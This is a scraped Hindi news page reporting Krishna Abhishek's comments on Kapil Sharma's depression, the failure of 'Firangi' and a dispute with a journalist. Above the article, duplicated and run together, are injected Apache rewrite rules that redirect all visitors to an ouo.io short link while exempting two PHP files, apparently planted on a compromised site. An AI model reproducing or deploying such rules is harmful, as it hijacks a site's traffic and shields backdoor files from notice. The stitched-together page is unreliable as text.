
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 759
Nextनई दिल्ली। कॉमेडियन कपिल शर्मा की मुसीबतें कम होने का नाम नहीं ले रही है। और कुछ नहीं तो अब एक जर्नलिस्ट से ही कपिल का पंगा हो गया। आखिर क्या वजह है इन सबकी। इन सब विवादों के बाद कृष्णा अभिषेक ने इस पर से पर्दा हटाया है। कृष्णा के मुताबिक कपिल अपनी फिल्म 'फिरंगी' की असफलता के बाद से काफी परेशान हैं। कृष्णा ने कहा कि 'फिरंगी' में कपिल ने काफी पैसा लगाया था और फिल्म बॉक्स ऑफिस पर कुछ खास कमाल नहीं दिखा पाई। इसके बाद अब हाल ही में आया उनका नया सीरियल 'फैमिली टाइम विद कपिल' को भी अच्छा रिस्पॉन्स नहीं मिला जिससे कपिल बहुत परेशान हैं। कृष्णा ने ये भी कहा कि कपिल को ऐसे ट्वीट्स नहीं करने चाहिए। कृष्णा ने कहा कि उन्होंने आज तक इससे पहले कभी कपिल का सपोर्ट नहीं किया, लेकिन अब जब सभी उन पर कमेंट कर रहे हैं तो उन्हें बुरा लग रहा है। इसके साथ ही कृष्णा ने सभी से कपिल को माफ करने की अपील भी की है। वहीं जर्नलिस्ट के बारे में कृष्णा ने कहा कि डिप्रेशन से जूझ रहे कपिल के बारे में नेगेटिव बातें लिखना और उन्हें परेशान करना भी सही नहीं हैं। वहीं कपिल की कथित एक्स-गर्लफ्रेंड के बारे में बात करते हुए कृष्णा ने कहा कि उन्होंने प्रीति के साथ ड्रामा कंपनी में काम किया है, लेकिन उन्होंने कभी कपिल की बीमारी के बारे में नहीं बताया।